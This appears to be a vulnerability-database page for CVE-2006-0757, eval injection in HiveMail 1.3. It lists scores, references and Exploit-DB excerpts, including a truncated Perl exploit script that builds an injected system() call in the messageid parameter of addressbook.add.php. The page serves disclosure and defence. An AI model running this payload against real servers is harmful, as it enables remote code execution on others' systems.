CVE-2006-0757
published 2006-02-18CVE-2006-0757: Multiple eval injection vulnerabilities in HiveMail 1.3 and earlier allow remote attackers to execute arbitrary PHP code via (1) the contactgroupid parameter…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.24%
86.7th percentile
Multiple eval injection vulnerabilities in HiveMail 1.3 and earlier allow remote attackers to execute arbitrary PHP code via (1) the contactgroupid parameter in addressbook.update.php, (2) the messageid parameter in addressbook.add.php, (3) the folderid parameter in folders.update.php, and possibly certain parameters in (4) calendar.event.php, (5) index.php, (6) pop.download.php, (7) read.bounce.php, (8) rules.block.php, (9) language.php, and (10) certain other scripts, as demonstrated by an addressbook.update.php request with a contactgroupid value of phpinfo() preceded by facilitators.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hivemail | hivemail | — | — |
| hivemail | hivemail | — | — |
| hivemail | hivemail | — | — |
| hivemail | hivemail | — | — |
| hivemail | hivemail | — | — |
| hivemail | hivemail | — | — |
| hivemail | hivemail | — | — |
| hivemail | hivemail | — | — |
| hivemail | hivemail | — | — |
| hivemail | hivemail | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HiveMail 1.3 - 'addressbook.add.php' Remote Code Execution
exploitdb·2006-05-06
CVE-2006-0759 HiveMail 1.3 - 'addressbook.add.php' Remote Code Execution
HiveMail 1.3 - 'addressbook.add.php' Remote Code Execution
---
#!/usr/bin/perl #
# #
# HiveMail \$host, # input host to test.
'session=s' => \$session, # input host to test.
# connection options
'basic_auth_user=s' => \$basic_auth_user,
'basic_auth_pass=s' => \$basic_auth_pass,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'timeout=i' => \$conn_timeout);
# command line sanity check
&show_usage unless ($host);
&show_usage unless ($session);
# main loop
while (1){
print "\n[hivemail] ";
my $cmd = ;
hm_xploit ($cmd);
}
exit (1);
#exploit
sub hm_xploit {
chomp (my $data = shift);
if ($data eq "exit") { print "\n[e] Exit!\n";exit(); }
my $exp = $host."addressbook.add.php?hivesession=".$session."&cmd=quick&messageid=\");echo%20\"start_er\";system(\
Exploit-DB
HiveMail 1.2.2/1.3 - 'addressbook.update.php?contactgroupid' Arbitrary PHP Command Execution
exploitdb·2006-02-11
CVE-2006-0757 HiveMail 1.2.2/1.3 - 'addressbook.update.php?contactgroupid' Arbitrary PHP Command Execution
HiveMail 1.2.2/1.3 - 'addressbook.update.php?contactgroupid' Arbitrary PHP Command Execution
---
source: https://www.securityfocus.com/bid/16591/info
HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection.
The PHP code-execution issues are the result of an input-validation error that may allow user-supplied PHP code to be evaluated by the interpreter.
The cross-site scripting vulnerabilities may permit a remote attacker to steal cookie-based authentication credentials from legitimate users.
The SQL-injection issues are the result of the application's failure to properly sanitize user-supplied input that will be included in SQL queries. Successful exploitation of SQL-injection
Exploit-DB
HiveMail 1.2.2/1.3 - 'folders.update.php?folderid' Arbitrary PHP Command Execution
exploitdb·2006-02-11
CVE-2006-0757 HiveMail 1.2.2/1.3 - 'folders.update.php?folderid' Arbitrary PHP Command Execution
HiveMail 1.2.2/1.3 - 'folders.update.php?folderid' Arbitrary PHP Command Execution
---
source: https://www.securityfocus.com/bid/16591/info
HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection.
The PHP code-execution issues are the result of an input-validation error that may allow user-supplied PHP code to be evaluated by the interpreter.
The cross-site scripting vulnerabilities may permit a remote attacker to steal cookie-based authentication credentials from legitimate users.
The SQL-injection issues are the result of the application's failure to properly sanitize user-supplied input that will be included in SQL queries. Successful exploitation of SQL-injection vulnerabil
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2006-02/0162.htmlhttp://forum.hivemail.com/showthread.php?p=26745http://secunia.com/advisories/18807http://www.gulftech.org/?node=research&article_id=00098-02102006http://www.securityfocus.com/bid/16591http://www.vupen.com/english/advisories/2006/0527https://exchange.xforce.ibmcloud.com/vulnerabilities/24618http://archives.neohapsis.com/archives/bugtraq/2006-02/0162.htmlhttp://forum.hivemail.com/showthread.php?p=26745http://secunia.com/advisories/18807http://www.gulftech.org/?node=research&article_id=00098-02102006http://www.securityfocus.com/bid/16591http://www.vupen.com/english/advisories/2006/0527https://exchange.xforce.ibmcloud.com/vulnerabilities/24618
2006-02-18
Published